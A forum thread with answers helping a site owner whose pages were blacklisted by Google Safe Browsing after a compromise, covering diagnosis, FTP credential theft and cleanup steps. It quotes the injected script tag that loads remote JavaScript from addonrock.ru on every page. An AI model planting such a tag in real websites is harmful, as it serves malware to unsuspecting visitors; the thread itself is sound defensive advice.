Reported Attack Page : how to resolve this problem

Solution 1:

Your website has been balcklisted by Google Safe browsing. It is integrated in Firefox, Safari, and Chrome (not Internet Explorer).

First check what Google Safe Browsing says about your domain on the diagnostic page:

Malicious software is hosted on 1 domain(s), including addonrock.ru/

So, somewhere, you have a link to this domain. Indeed, on all your pages, you'll find this at the end of the code, after the </html> tag:

<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>

You're web application has been hacked! If you are using an open-source application, check if you are running the latest version (check the plugins as well). There may be a known vulnerability.

Here is what to do next:

  1. understand how your site was hacked: known vulnerability in application, problem with your hosting provider, vulnerability in your code (remote file inclusion, etc.), etc.
  2. plug the hole: upgrade your application, fix your own code, etc.
  3. check all your files and databases for any malicious code
  4. restore a safe backup

Step 4 is OK if you are sure that the attackers has not left any backdoor. Of course, you can never be 100% sure.... If you have enough time and money, use a new server to host your website.

Solution 2:

Well, assuming that you are not deliberately distributing malware, my bet is that you got hacked and either viruses or malware are being distributed from your website.

This page has details on what's going on.

Take everything down and restore from a known-good backup.

Solution 3:

Scripts from addonrock.ru and alienradar.ru get inserted via FTP.

Some Windows malware picks up the FTP login info from Filezilla and other common FTP clients.

So basically:

1) Clean your client machine. 2) Change all passwords on server. 3) Replace all infected files. If you don't have access to a log, just replace all of them.